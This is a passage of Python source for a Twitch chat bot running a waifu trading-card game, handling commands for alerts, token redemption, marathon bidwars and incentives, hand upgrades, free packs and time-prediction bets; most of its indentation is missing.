self.message(channel, "Usage: !owners <id>", isWhisper=isWhisper)
return
if infoCommandAvailable(tags['user-id'], sender, tags['display-name'], self, channel, isWhisper):
try:
waifu = getWaifuById(args[0])
assert waifu is not None
assert waifu['can_lookup'] == 1
ownerData = getWaifuOwners(waifu['id'], waifu['base_rarity'])
ownerDescriptions = ownerData[0]
packholders = ownerData[1]
waifu["rarity"] = config["rarity%dName" % waifu["base_rarity"]]
if len(ownerDescriptions) > 0:
waifu["owned"] = " is owned by " + ", ".join(ownerDescriptions)
if len(packholders) > 0:
waifu["owned"] += "; in a pack for: " + ", ".join(packholders)
elif len(packholders) > 0:
waifu["owned"] = " is in a pack for: " + ", ".join(packholders)
elif waifu["pulls"] > 0:
waifu["owned"] = " is not currently owned or in a pack"
else:
waifu["owned"] = " has not dropped yet"
self.message(channel,
'[{id}][{rarity}] {name} from {series}{owned}.'.format(
**waifu),
isWhisper=isWhisper)
if sender not in superadmins:
useInfoCommand(tags['user-id'], sender, channel, isWhisper)
except Exception:
self.message(channel, "Invalid waifu ID.", isWhisper=isWhisper)
return
if command == "whisper":
if followsme(tags['user-id']):
self.message("#jtv", "/w {user} This is a test whisper.".format(user=sender), isWhisper=False)
self.message(channel, "Attempted to send test whisper.", isWhisper=isWhisper)
else:
self.message(channel, "{user}, you need to be following me so I can send you whispers!".format(
user=str(tags['display-name'])), isWhisper=isWhisper)
return
if command == "help":
self.message(channel, config["siteHost"] + "/help", isWhisper=isWhisper)
if command == "nepdoc":
self.message(channel, config["nepdocURL"], isWhisper=isWhisper)
if command == "alerts" or command == "alert":
if len(args) < 1:
self.message(channel,
"Usage: !alerts setup OR !alerts test <rarity/set> OR !alerts config <config Name> <config Value>",
isWhisper=isWhisper)
return
sender = sender.lower()
subcmd = str(args[0]).lower()
if subcmd == "setup":
cur = db.cursor()
cur.execute("SELECT alertkey FROM channels WHERE name=%s", [sender])
row = cur.fetchone()
if row is None:
self.message(channel,
"The bot is not in your channel, so alerts can't be set up for you. Ask an admin to let it join!",
isWhisper=isWhisper)
                    cur.close()
                    return
if row[0] is None:
self.message("#jtv",
"/w {user} Please go to the following link and allow access: {link}{user}".format(
user=sender.strip(), link=str(streamlabsauthurl).strip()), isWhisper=False)
self.message(channel,
"Sent you a whisper with a link to set up alerts. If you didnt receive a whisper, try !whisper",
isWhisper=isWhisper)
else:
self.message(channel,
"Alerts seem to already be set up for your channel! Use !alerts test to test them!",
isWhisper)
cur.close()
return
if subcmd == "test":
isSet = False
if len(args) > 1 and args[1].lower() == "set":
rarity = int(config["numNormalRarities"]) - 1
isSet = True
else:
try:
rarity = parseRarity(args[1])
except Exception:
rarity = int(config["numNormalRarities"]) - 1
cur = db.cursor()
cur.execute("SELECT alertkey FROM channels WHERE name=%s", [sender])
row = cur.fetchone()
cur.close()
if row is None or row[0] is None:
self.message(channel,
"Alerts do not seem to be set up for your channel, please set them up using !alerts setup",
isWhisper=isWhisper)
else:
if isSet:
threading.Thread(target=sendSetAlert, args=(
sender, sender, "Test Set", ["Neptune", "Nepgear", "Some other test waifu"], "0 pudding",
False, False)).start()
else:
threading.Thread(target=sendDrawAlert, args=(
sender, {"name": "Test Alert, please ignore", "base_rarity": rarity,
"image": "http://t.fuelr.at/k6g"},
str(tags["display-name"]), False)).start()
self.message(channel, "Test Alert sent.", isWhisper=isWhisper)
return
if subcmd == "config":
try:
configName = args[1]
except Exception:
self.message(channel, "Valid alert config options: " + ", ".join(validalertconfigvalues),
isWhisper=isWhisper)
return
if configName == "reset":
cur = db.cursor()
cur.execute("DELETE FROM alertConfig WHERE channelName = %s", [sender])
cur.close()
self.message(channel, "Removed all custom alert config for your channel. #NoireScreamRules",
isWhisper=isWhisper)
return
if configName not in validalertconfigvalues:
self.message(channel, "Valid alert config options: " + ", ".join(validalertconfigvalues),
isWhisper=isWhisper)
return
try:
configValue = args[2]
except Exception:
cur = db.cursor()
cur.execute("SELECT val FROM alertConfig WHERE channelName=%s AND config = %s",
[sender, configName])
rows = cur.fetchall()
if len(rows) != 1:
self.message(channel, 'Alert config "' + configName + '" is unset for your channel.',
isWhisper=isWhisper)
else:
configValue = rows[0][0]
self.message(channel,
'Alert config "' + configName + '" is set to "' + configValue + '" for your channel.',
isWhisper=isWhisper)
cur.close()
return
cur = db.cursor()
cur.execute("SELECT val FROM alertConfig WHERE channelName=%s AND config = %s",
[sender, configName])
rows = cur.fetchall()
if configValue == "reset":
cur.execute("DELETE FROM alertConfig WHERE channelName=%s AND config=%s", [sender, configName])
cur.close()
self.message(channel, 'Reset custom alert config "' + configName + '" for your channel.',
isWhisper=isWhisper)
return
if configName == "alertChannel" and configValue not in ["host", "donation", "follow", "reset",
"subscription"]:
self.message(channel,
                        'Valid options for alertChannel: "host", "donation", "follow", "subscription", "reset"',
                        isWhisper=isWhisper)
cur.close()
return
if len(rows) == 1:
cur.execute("UPDATE alertConfig SET val=%s WHERE channelName=%s AND config = %s",
[configValue, sender, configName])
else:
cur.execute("INSERT INTO alertConfig(val, channelName, config) VALUE (%s, %s, %s)",
[configValue, sender, configName])
cur.close()
self.message(channel, 'Set alert config value "' + configName + '" to "' + configValue + '"',
isWhisper=isWhisper)
return
self.message(channel,
"Usage: !alerts setup OR !alerts test <rarity> OR !alerts config <config Name> <config Value>",
isWhisper=isWhisper)
return
if command == "togglehoraro" and sender in admins and booleanConfig("marathonBotFunctions"):
self.autoupdate = not self.autoupdate
if self.autoupdate:
self.message(channel, "Enabled Horaro Auto-update.", isWhisper=isWhisper)
else:
self.message(channel, "Disabled Horaro Auto-update.", isWhisper=isWhisper)
return
if sender in admins and command in ["status", "title"] and isMarathonChannel and booleanConfig("marathonBotFunctions"):
updateTitle(" ".join(args))
self.message(channel, "%s -> Title updated to %s." % (tags['display-name'], " ".join(args)))
return
if sender in admins and command == "game" and isMarathonChannel and booleanConfig("marathonBotFunctions"):
updateGame(" ".join(args))
self.message(channel, "%s -> Game updated to %s." % (tags['display-name'], " ".join(args)))
return
if sender in admins and booleanConfig("marathonBotFunctions") and command == "ffzfollowing":
MarathonBot.instance.updateFollowButtons(args)
self.message(channel, "%s -> Attempted to update follower buttons to %s." % (tags['display-name'], ", ".join(args)))
return
if command == "emotewar":
if int(config["emoteWarStatus"]) == 0:
self.message(channel, "The Emote War is not active right now.", isWhisper)
return
with db.cursor() as cur:
cur.execute("SELECT `name`, `count` FROM emoteWar ORDER BY `count` DESC")
r = cur.fetchall()
msg = "Current War: " if int(config["emoteWarStatus"]) == 1 else "THE WAR HAS BEEN DECIDED: "
for row in r:
msg += str(row[0]) + " " + str(row[1]) + " "
msg += ". Spamming DOES NOT COUNT, spammers will get timed out."
self.message(channel, msg, isWhisper=isWhisper)
return
if command == "nepjoin" and sender.lower() in superadmins:
if len(args) != 1:
self.message(channel, "Usage: !nepjoin <channelname>", isWhisper=isWhisper)
return
chan = str(args[0]).replace("'", "").lower()
if ('#' + chan) in self.mychannels or ('#' + chan) in self.addchannels:
self.message(channel, "Already in that channel!", isWhisper=isWhisper)
return
try:
cur = db.cursor()
cur.execute("SELECT COUNT(*) FROM users WHERE name=%s", [str(chan)])
if (cur.fetchone()[0] or 0) < 1:
self.message(channel,
"That user is not yet in the database! Let them talk in a channel the Bot is in to change that!",
isWhisper=isWhisper)
cur.close()
return
cur.execute("INSERT INTO channels(name) VALUES (%s)", [str(chan)])
self.join("#" + chan)
self.message("#" + chan, "Hi there!", isWhisper=False)
self.addchannels.append('#' + chan)
self.message(channel, "Joined #" + chan, isWhisper=isWhisper)
cur.close()
return
except Exception:
self.message(channel, "Tried joining, failed. Tell Marenthyu the following: " + str(sys.exc_info()),
isWhisper=isWhisper)
logger.error("Error Joining channel %s: %s", chan, str(sys.exc_info()))
return
if command == "nepleave" and (sender in superadmins or ("#" + sender) == str(channel)):
if len(args) > 0:
self.message(channel, "nepleave doesn't take in argument. Type it in the channel to leave.",
isWhisper=isWhisper)
return
try:
cur = db.cursor()
cur.execute("DELETE FROM channels WHERE name = %s", [channel[1:]])
self.leavechannels.append(str(channel))
# self.mychannels.remove(str(channel))
self.message(channel, "ByeBye!", isWhisper=False)
self.part(channel)
cur.close()
return
except Exception:
self.message(channel, "Tried to leave but failed D:", isWhisper=isWhisper)
logger.error("Error leaving %s: %s", channel, str(sys.exc_info()))
return
if command == "reload" and sender in superadmins:
# print("in reload command")
loadConfig()
self.message(channel, "Config reloaded.", isWhisper=isWhisper)
return
if command == "redeem":
if len(args) != 1:
self.message(channel, "Usage: !redeem <token>", isWhisper=isWhisper)
return
cur = db.cursor()
            # find a claimable token matching this code and the redeemer's eligibility restrictions
cur.execute(
"SELECT id, points, waifuid, boostername, type, badgeID FROM tokens WHERE token=%s AND claimable=1 AND (only_redeemable_by IS NULL OR only_redeemable_by = %s) AND (not_redeemable_by IS NULL OR not_redeemable_by != %s) LIMIT 1",
[args[0], tags['user-id'], tags['user-id']])
redeemablerows = cur.fetchall()
if len(redeemablerows) == 0:
self.message(channel, "Unknown token.", isWhisper)
cur.close()
return
redeemdata = redeemablerows[0]
# already claimed by this user?
cur.execute("SELECT COUNT(*) FROM tokens_claimed WHERE tokenid = %s AND userid = %s",
[redeemdata[0], tags['user-id']])
claimed = cur.fetchone()[0] or 0
if claimed > 0:
self.message(channel, "%s, you have already claimed this token!" % tags['display-name'], isWhisper)
cur.close()
return
# booster?
packid = None
cardid = None
received = []
if redeemdata[3] is not None:
# check for an open booster in their account
# checked first because it's the only way a redeem can be blocked entirely
cur.execute("SELECT COUNT(*) FROM boosters_opened WHERE userid = %s AND status = 'open'",
[tags['user-id']])
boosteropen = cur.fetchone()[0] or 0
if boosteropen > 0:
self.message(channel,
"%s, you can't claim this token while you have an open booster! !booster show to check it." %
tags['display-name'], isWhisper)
cur.close()
return
try:
packid = openBooster(self, tags['user-id'], sender, tags['display-name'], channel, isWhisper, redeemdata[3],
False)
if checkHandUpgrade(tags['user-id']):
messageForHandUpgrade(tags['user-id'], tags['display-name'], self, channel, isWhisper)
received.append("a free booster: %s/booster?user=%s" % (config["siteHost"], sender))
except InvalidBoosterException:
discordbody = {
"username": "WTCG Admin",
"content" : "Booster type %s is broken, please fix it." % redeemdata[3]
}
threading.Thread(target=sendAdminDiscordAlert, args=(discordbody,)).start()
self.message(channel,
"There was an error processing your redeem, please try again later.",
isWhisper)
cur.close()
return
# waifu?
if redeemdata[2] is not None:
waifuinfo = getWaifuById(redeemdata[2])
cardid = addCard(tags['user-id'], waifuinfo['id'], 'redeem')
if waifuinfo['base_rarity'] < int(config["numNormalRarities"]) - 1:
attemptPromotions(waifuinfo['id'])
waifuinfo['rarity'] = config["rarity%dName" % waifuinfo['base_rarity']]
received.append("A waifu: [{id}][{rarity}] {name} from {series}".format(**waifuinfo))
# points
if redeemdata[1] != 0:
addPoints(tags['user-id'], redeemdata[1])
received.append("%d points" % redeemdata[1])
# badge?
if redeemdata[5] is not None:
badge = getBadgeByID(redeemdata[5])
success = giveBadge(tags['user-id'], badge["id"])
if success:
received.append("A shiny new Badge: %s" % badge["name"])
else:
received.append("An invalid badge, or a badge you already had: %s" % badge["name"])
cur.execute(
"INSERT INTO tokens_claimed (tokenid, userid, points, waifuid, cardid, boostername, boosterid, timestamp, badgeID) VALUES(%s, %s, %s, %s, %s, %s, %s, %s, %s)",
[redeemdata[0], tags['user-id'], redeemdata[1], redeemdata[2], cardid, redeemdata[3], packid,
current_milli_time(), redeemdata[5]])
# single use?
if redeemdata[4] == 'single':
cur.execute("UPDATE tokens SET claimable = 0 WHERE id = %s", [redeemdata[0]])
# show results
self.message(channel,
"%s -> Successfully redeemed the token %s, added the following to your account -> %s" % (
tags['display-name'], args[0], " and ".join(received[::-1])), isWhisper)
cur.close()
return
if command == "wars":
with db.cursor() as cur:
cur.execute("SELECT id, title FROM bidWars WHERE status = 'open'")
wars = []
warnum = 0
for war in cur.fetchall():
warnum += 1
wars.append("%s%s (!war %s)" % ("; " if warnum > 1 else "", war[1], war[0]))
if len(wars) == 0:
self.message(channel,
"%s, there are no bidwars currently open right now." % tags['display-name'],
isWhisper)
else:
messages = ["Current Bidwars: "]
for war in wars:
if len(messages[-1]) + len(war) > 400:
messages.append(war)
else:
messages[-1] += war
for message in messages:
self.message(channel, message, isWhisper)
return
if command == "war":
if len(args) != 1:
self.message(channel, "Usage: !war <id>", isWhisper)
return
with db.cursor() as cur:
cur.execute(
"SELECT id, title, status, openEntry, openEntryMinimum, openEntryMaxLength FROM bidWars WHERE id = %s AND status != 'hidden'",
[args[0]])
war = cur.fetchone()
if war is None:
self.message(channel, "%s -> Invalid bidwar specified." % tags['display-name'], isWhisper)
return
warid = war[0]
title = war[1]
status = war[2]
openEntry = war[3] != 0
openEntryMinimum = war[4]
openEntryMaxLength = war[5]
# get choices
cur.execute(
"SELECT choice, amount FROM bidWarChoices WHERE warID = %s ORDER BY amount DESC, choice ASC",
[warid])
choices = cur.fetchall()
# render
if len(choices) == 0:
if openEntry and status == 'open':
self.message(channel,
"The %s bidwar has no choices defined yet! Add your own for %d or more points with !vote %s <choice> <points>" % (
title, openEntryMinimum, warid), isWhisper)
else:
                    # this bidwar was never set up properly; pretend it doesn't exist
self.message(channel, "%s -> Invalid bidwar specified." % tags['display-name'], isWhisper)
return
if status == 'closed':
# does the "first place" actually have any votes?
if choices[0][1] == 0:
# no, so this bid war hasn't started yet, don't let on it exists
self.message(channel, "%s -> Invalid bidwar specified." % tags['display-name'], isWhisper)
else:
runnersup = ", ".join("%s (%d points)" % (choice[0], choice[1]) for choice in choices[1:])
self.message(channel,
"The %s bidwar is over! The winner was %s with %d points. Runners up: %s" % (
title, choices[0][0], choices[0][1], runnersup), isWhisper)
else:
# open war
choicesStr = ", ".join("%s (%d points)" % (choice[0], choice[1]) for choice in choices)
msg = "The %s bidwar is currently open! Current votes: %s. !vote %s <choice> <points> to have your say." % (
title, choicesStr, warid)
if openEntry:
msg += " You can add a new choice by contributing at least %d points (%d characters maximum)." % (
openEntryMinimum, openEntryMaxLength)
self.message(channel, msg, isWhisper)
return
if command in ["vote", "donate"] and isMarathonChannel:
            # pudding mode: a trailing "pudding" argument pays with pudding instead of points
puddingMode = False
if len(args) > 0 and args[-1].lower() == "pudding":
puddingMode = True
args = args[:-1]
if len(args) == 1:
# special case: is there only 1 incentive and no bidwars?
with db.cursor() as cur:
cur.execute("SELECT COUNT(*) FROM bidWars WHERE `status` = 'open'")
warCount = cur.fetchone()[0] or 0
cur.execute("SELECT COUNT(*) FROM incentives WHERE `status` = 'open'")
incCount = cur.fetchone()[0] or 0
if warCount == 0 and incCount == 1:
# donate to that incentive
cur.execute("SELECT id FROM incentives WHERE `status` = 'open' LIMIT 1")
args = [cur.fetchone()[0]] + args
if len(args) < 2:
if command == "vote":
self.message(channel, "Usage: !vote <warid> <choice> <amount>", isWhisper)
else:
self.message(channel,
"Usage: !donate <id> <amount> (!incentives to see a list of incentives / IDs)",
isWhisper)
return
with db.cursor() as cur:
# find out if this is a bidwar, an incentive or nothing
cur.execute("SELECT id, title, status, openEntry, openEntryMinimum, openEntryMaxLength FROM bidWars WHERE id = %s AND status != 'hidden'", [args[0]])
war = cur.fetchone()
if war is not None:
if len(args) < 3:
self.message(channel, "Usage: !vote <warid> <choice> <amount>", isWhisper)
return
warid = war[0]
title = war[1]
status = war[2]
openEntry = war[3] != 0
openEntryMinimum = war[4]
openEntryMaxLength = war[5]
if status == 'closed':
self.message(channel, "%s -> That bidwar is currently closed." % tags['display-name'])
return
# pudding mode?
exchangeRate = int(config["puddingExchangeRateMarathon"])
currency = 'pudding' if puddingMode else 'points'
# check their points entry
try:
points = int(args[-1])
if points <= 0:
raise ValueError()
except ValueError:
self.message(channel, "%s -> Invalid amount of points/pudding entered." % tags['display-name'])
return
if puddingMode:
if not hasPudding(tags['user-id'], points):
self.message(channel, "%s -> You don't have that much pudding!" % tags['display-name'])
return
contribution = points * exchangeRate
contributionStr = "%d pudding (-> %d points)" % (points, contribution)
else:
if not hasPoints(tags['user-id'], points):
self.message(channel, "%s -> You don't have that many points!" % tags['display-name'])
return
contribution = points
contributionStr = "%d points" % points
cur.execute(
"SELECT choice, amount FROM bidWarChoices WHERE warID = %s ORDER BY amount DESC, choice ASC",
[warid])
choices = cur.fetchall()
choiceslookup = [choice[0].lower() for choice in choices]
theirchoice = " ".join(args[1:-1]).strip()
theirchoiceL = theirchoice.lower()
if theirchoiceL not in choiceslookup:
# deal with custom choice entry
if not openEntry:
self.message(channel, "%s -> That isn't a valid choice for the %s bidwar." % (
tags['display-name'], title))
return
for word in bannedWords:
if word in theirchoiceL:
#self.message(channel, ".timeout %s 300" % sender, isWhisper)
self.message(channel,
"%s -> No vulgar choices allowed (warning)" % tags['display-name'])
return
if contribution < openEntryMinimum:
self.message(channel,
"%s -> You must contribute at least %d points or %d pudding to add a new choice to this bidwar!" % (
tags['display-name'], openEntryMinimum, math.ceil(openEntryMinimum / exchangeRate)), isWhisper)
return
if len(theirchoice) > openEntryMaxLength:
self.message(channel,
"%s -> The maximum length of a choice in the %s bidwar is %d characters." % (
tags['display-name'], title, openEntryMaxLength), isWhisper)
return
# all clear, add it
if puddingMode:
takePudding(tags['user-id'], points)
else:
addPoints(tags['user-id'], -points)
actionTime = current_milli_time()
qargs = [warid, theirchoice, contribution, actionTime, tags['user-id'], actionTime, tags['user-id']]
cur.execute(
"INSERT INTO bidWarChoices (warID, choice, amount, created, creator, lastVote, lastVoter) VALUES(%s, %s, %s, %s, %s, %s, %s)",
qargs)
logargs = [tags['user-id'], warid, theirchoice, points, contribution, currency, current_milli_time()]
else:
# already existing choice, just vote for it
if puddingMode:
takePudding(tags['user-id'], points)
else:
addPoints(tags['user-id'], -points)
qargs = [contribution, current_milli_time(), tags['user-id'], warid, theirchoiceL]
cur.execute(
"UPDATE bidWarChoices SET amount = amount + %s, lastVote = %s, lastVoter = %s WHERE warID = %s AND choice = %s",
qargs)
logargs = [tags['user-id'], warid, theirchoiceL, points, contribution, currency, current_milli_time()]
cur.execute("INSERT INTO `contributionLog` (`userid`, `to_id`, `to_choice`, `raw_amount`, `contribution`, `currency`, `timestamp`) " +
"VALUES(%s, %s, %s, %s, %s, %s, %s)", logargs)
self.message(channel, "%s -> Successfully added %s to %s in the %s bidwar." % (
tags['display-name'], contributionStr, theirchoice, title))
return
else:
cur.execute("SELECT id, title, amount, required FROM incentives WHERE id = %s AND status = 'open'", [args[0]])
incentive = cur.fetchone()
if incentive is None:
self.message(channel, "%s -> Invalid incentive/war ID." % tags['display-name'])
return
incid = incentive[0]
title = incentive[1]
currAmount = incentive[2]
required = incentive[3]
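                    # the BonusGame incentive scales displayed amounts up 10,000,000x for show;
                    # stored contributions are unaffected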
memeMult = (10000000 if incid == "BonusGame" else 1)
if currAmount >= required:
self.message(channel,
"%s -> The %s incentive has already been met!" % (tags['display-name'], title))
return
try:
points = int(args[1])
if points <= 0:
raise ValueError()
except ValueError:
self.message(channel, "%s -> Invalid amount of points/pudding entered." % tags['display-name'])
return
if puddingMode:
exchangeRate = int(config["puddingExchangeRateMarathon"])
points = min(points, math.ceil((required - currAmount) / exchangeRate))
if not hasPudding(tags['user-id'], points):
self.message(channel, "%s -> You don't have that much pudding!" % tags['display-name'])
return
takePudding(tags['user-id'], points)
contribution = min(points * exchangeRate, required - currAmount)
contributionStr = "%d pudding (-> %d points)" % (points, contribution * memeMult)
currency = 'pudding'
else:
points = min(points, required - currAmount)
if not hasPoints(tags['user-id'], points):
self.message(channel, "%s -> You don't have that many points!" % tags['display-name'])
return
addPoints(tags['user-id'], -points)
contribution = points
contributionStr = "%d points" % (points * memeMult)
currency = 'points'
cur.execute(
"UPDATE incentives SET amount = amount + %s, lastContribution = %s, lastContributor = %s WHERE id = %s",
[contribution, current_milli_time(), tags['user-id'], incid])
logargs = [tags['user-id'], incid, None, points, contribution, currency, current_milli_time()]
cur.execute("INSERT INTO `contributionLog` (`userid`, `to_id`, `to_choice`, `raw_amount`, `contribution`, `currency`, `timestamp`) " +
"VALUES(%s, %s, %s, %s, %s, %s, %s)", logargs)
if contribution + currAmount >= required:
self.message(channel, "%s -> You successfully donated %s and met the %s incentive!" % (
tags['display-name'], contributionStr, title), isWhisper)
else:
self.message(channel,
"%s -> You successfully donated %s towards the %s incentive. It needs %d more points to be met." % (
tags['display-name'], contributionStr, title, (required - currAmount - contribution) * memeMult),
isWhisper)
return
if command == "incentives" and (isMarathonChannel or isWhisper):
with db.cursor() as cur:
cur.execute("SELECT id, title, amount, required FROM incentives WHERE status = 'open'")
incentives = []
incnum = 0
for ic in cur.fetchall():
incnum += 1
if ic[2] >= ic[3]:
incentives.append("%s%s (%s) - MET!" % ("; " if incnum > 1 else "", ic[1], ic[0]))
elif ic[1] == "BonusGame":
incentives.append(
"%s%s (%s) - %d/%d points" % ("; " if incnum > 1 else "", ic[1], ic[0], ic[2] * 10000000, ic[3] * 10000000))
else:
incentives.append(
"%s%s (%s) - %d/%d points" % ("; " if incnum > 1 else "", ic[1], ic[0], ic[2], ic[3]))
if len(incentives) == 0:
self.message(channel,
"%s, there are no incentives currently open right now." % tags['display-name'],
isWhisper)
else:
incentives.append(
". !donate <id> <points> to contribute to an incentive (id is the text in brackets)")
messages = ["Current Open Incentives: "]
for inc in incentives:
if len(messages[-1]) + len(inc) > 400:
messages.append(inc)
else:
messages[-1] += inc
for message in messages:
self.message(channel, message, isWhisper)
return
if command == "upgrade":
user = tags['user-id']
if checkHandUpgrade(user):
messageForHandUpgrade(tags['user-id'], tags['display-name'], self, channel, isWhisper)
return
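            # the direct-buy price is half (multiplier 0.5) of the remaining pack spending
            # needed for the next hand slot, with a floor of 1 point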
spendingsToNext = getNextUpgradeSpendings(user) - getSpendings(user)
multiplier = 0.5 # TODO: Make multiplier configurable
directPrice = max(int(spendingsToNext * multiplier), 1)
if len(args) > 0 and args[0] == "buy":
if hasPoints(user, directPrice):
                    addPoints(user, -directPrice)
addSpending(user, spendingsToNext)
upgradeHand(user, gifted=False)
self.message(channel, "Successfully upgraded {user}'s hand for {price} points!".format(
user=tags['display-name'], price=str(directPrice)), isWhisper=isWhisper)
return
else:
self.message(channel,
"{user}, you do not have enough points to upgrade your hand for {price} points.".format(
user=tags['display-name'], price=str(directPrice)), isWhisper=isWhisper)
return
currLimit = handLimit(tags['user-id'])
msgArgs = (tags['display-name'], currLimit, currLimit + 1, spendingsToNext, directPrice)
self.message(channel, ("%s, you currently have %d slots from pack spending. " +
"For space #%d, spend %d more points or use !upgrade buy for %d points.") % msgArgs,
isWhisper)
return
if command == "announce":
            if sender not in superadmins:
self.message(channel, "Admin Only Command.", isWhisper=isWhisper)
return
if len(args) < 1:
self.message(channel, "Usage: !announce <message>", isWhisper=isWhisper)
return
msg = " ".join(args)
for ch in self.mychannels:
self.message(ch, msg, isWhisper=False)
sendPushNotification('all', {'type': 'announcement',
'message': msg, 'openurl': config['siteHost'] + '/discord'})
self.message(channel, "Sent Announcement to all channels.", isWhisper=isWhisper)
return
if command == "search":
if len(args) < 1:
self.message(channel, "Usage: !search <name>[ from <series>]", isWhisper=isWhisper)
return
if infoCommandAvailable(tags['user-id'], sender, tags['display-name'], self, channel, isWhisper):
try:
from_index = [arg.lower() for arg in args].index("from")
q = " ".join(args[:from_index])
series = " ".join(args[from_index + 1:])
except ValueError:
q = " ".join(args)
series = None
result = search(q, series)
if len(result) == 0:
self.message(channel, "No waifu found with that name.", isWhisper=isWhisper)
return
if len(result) > 8:
self.message(channel, "Too many results! ({amount}) - try a longer search query.".format(
amount=str(len(result))), isWhisper=isWhisper)
return
if len(result) == 1:
self.message(channel,
"Found one waifu: [{w[id]}][{rarity}]{w[name]} from {w[series]} (use !lookup {w[id]} for more info)".format(
w=result[0], rarity=config['rarity' + str(result[0]['base_rarity']) + 'Name']),
isWhisper=isWhisper)
else:
self.message(channel, "Multiple results (Use !lookup for more details): " + ", ".join(
map(lambda waifu: str(waifu['id']), result)), isWhisper=isWhisper)
if sender not in superadmins:
useInfoCommand(tags['user-id'], sender, channel, isWhisper)
return
if command == "promote":
self.message(channel,
"Promotion is now automatic when you gather enough copies of a waifu at the same rarity in your hand.",
isWhisper)
return
if command == "recheckpromos" and sender in superadmins:
with db.cursor() as cur:
cur.execute("SELECT DISTINCT waifuid FROM cards WHERE userid IS NOT NULL AND boosterid IS NULL GROUP BY userid, waifuid, rarity HAVING COUNT(*) >= 2")
rows = cur.fetchall()
ids = [row[0] for row in rows]
attemptPromotions(*ids)
self.message(channel, "Rechecked promotions for %d waifus" % len(ids))
return
if command == "freepacks" or command == "freepack" or (command == "bet" and len(args) > 0 and args[0].lower() == "packs"):
if len(args) > 0 and args[0].lower() in ["open", "claim", "redeem"]:
if len(args) < 2:
self.message(channel, "Usage: !freepacks open <booster name>", isWhisper)
return
with db.cursor() as cur:
cur.execute("SELECT remaining, boostername FROM freepacks WHERE userid = %s AND boostername = %s", [tags['user-id'], args[1]])
result = cur.fetchone()
if result is None or result[0] == 0:
self.message(channel, "You don't have any free packs of that type left to claim!", isWhisper)
return
# can they actually open it?
cur.execute("SELECT COUNT(*) FROM boosters_opened WHERE userid = %s AND status = 'open'",
[tags['user-id']])
boosteropen = cur.fetchone()[0] or 0
if boosteropen > 0:
self.message(channel,
"%s, you can't open a free pack with an open booster! !booster show to check it." %
tags['display-name'], isWhisper)
return
# all good
try:
packid = openBooster(self, tags['user-id'], sender, tags['display-name'], channel, isWhisper, args[1], False)
if checkHandUpgrade(tags['user-id']):
messageForHandUpgrade(tags['user-id'], tags['display-name'], self, channel, isWhisper)
cur.execute("UPDATE freepacks SET remaining = remaining - 1 WHERE userid = %s AND boostername = %s", [tags['user-id'], args[1]])
self.message(channel, "%s, you open a free %s booster: %s/booster?user=%s" % (tags['display-name'], result[1], config["siteHost"], sender), isWhisper)
except InvalidBoosterException:
discordbody = {
"username": "WTCG Admin",
"content" : "Booster type %s is broken, please fix it." % args[1]
}
threading.Thread(target=sendAdminDiscordAlert, args=(discordbody,)).start()
self.message(channel,
"There was an error opening your free pack, please try again later.",
isWhisper)
return
return
else:
with db.cursor() as cur:
cur.execute("SELECT boostername, remaining FROM freepacks WHERE userid = %s AND remaining > 0", [tags['user-id']])
freepacks = cur.fetchall()
if len(freepacks) == 0:
self.message(channel, "%s, you don't have any free pack entitlements right now." % tags['display-name'], isWhisper)
else:
freeStr = ", ".join("%s x%d" % (fp[0], fp[1]) for fp in freepacks)
self.message(channel, "%s, your current free packs: %s. !freepacks open <name> to open one." % (tags['display-name'], freeStr), isWhisper)
return
if command == "bet":
if isWhisper:
self.message(channel, "You can't use bet commands over whisper.", isWhisper)
return
if len(args) < 1:
self.message(channel,
"Usage: !bet <time> OR !bet status OR (as channel owner) !bet open OR !bet start OR !bet end OR !bet cancel OR !bet results OR !bet forcereset",
isWhisper)
return
# check restrictions
with db.cursor() as cur:
cur.execute("SELECT betsBanned, forceresetsBanned FROM channels WHERE name = %s", [channel[1:]])
restrictions = cur.fetchone()
if restrictions is None:
# this shouldn't ever happen, but just in case...
self.message(channel, "This isn't a Waifu TCG channel. No can do.", isWhisper)
return
if restrictions[0] != 0:
self.message(channel, "Bets are currently banned in this channel.")
return
canAdminBets = sender in superadmins or (sender in admins and isMarathonChannel)
                isBroadcaster = "broadcaster" in str(tags["badges"])
canManageBets = canAdminBets or isBroadcaster
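                # if the first argument parses as a time, treat it as placing a bet;
                # otherwise fall through to the named subcommands below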
bet = parseBetTime(args[0])
if bet:
if sender == channel[1:]:
self.message(channel, "You can't bet in your own channel, sorry!", isWhisper)
return
                    betOpen = placeBet(channel, tags["user-id"], bet["total"])
                    if betOpen:
self.message(channel,
"Successfully entered {name}'s bet: {h}h {min}min {s}s {ms}ms".format(
h=bet["hours"],
min=bet["minutes"],
s=bet["seconds"],
ms=bet["ms"],
name=tags['display-name']),
isWhisper)
else:
self.message(channel, "The bets aren't open right now, sorry!", isWhisper)
return
else:
subcmd = str(args[0]).lower()
if canManageBets and subcmd == "open":
if openBet(channel):
self.message(channel, "Bets are now open! Use !bet HH:MM:SS(.ms) to submit your bet!")
else:
self.message(channel,
"There is already a prediction contest in progress in your channel! Use !bet status to check what to do next!")
return
elif canManageBets and subcmd == "start":
confirmed = args[-1].lower() == "yes"
try:
startBet(channel, confirmed)
self.message(channel, "Taking current time as start time! Good Luck! Bets are now closed.")
except NotEnoughBetsException:
self.message(channel, "WARNING: This bet does not currently have enough participants to be eligible for payout. To start anyway, use !bet start yes")
except NotOpenLongEnoughException:
self.message(channel, "You must wait at least %d minutes after opening a bet to start it." % int(config["betMinimumMinutesOpen"]))
except NoBetException:
self.message(channel,
"There wasn't an open prediction contest in your channel! Use !bet status to check current contest status.")
return
elif canManageBets and subcmd == "end":
resultData = endBet(str(channel).lower())
if resultData is None:
self.message(channel,
"There wasn't a prediction contest in progress in your channel! Use !bet status to check current contest status.")
else:
formattedTime = formatTimeDelta(resultData["result"])
winners = resultData["winners"]
winnerNames = []
for n in range(3):
winnerNames.append(winners[n]["name"] if len(winners) > n else "No-one")
self.message(channel,
"Contest has ended in {time}! The top 3 closest were: {first}, {second}, {third}".format(
time=formattedTime, first=winnerNames[0], second=winnerNames[1],
third=winnerNames[2]))
if not canAdminBets and len(winners) >= int(config["betMinimumEntriesForPayout"]):
# notify the discordhook of the new bet completion
chanStr = channel[1:].lower()
discordArgs = {"channel": chanStr, "time": formattedTime, "link": "https://twitch.tv/" + chanStr}
discordbody = {
"username": "WTCG Admin",
"content" : "A bet has just finished in {channel} with a time of {time}. Check results and consider payout at <{link}>.".format(**discordArgs)
}
threading.Thread(target=sendAdminDiscordAlert, args=(discordbody,)).start()
return
elif canManageBets and subcmd == "cancel":
if cancelBet(channel):
self.message(channel,
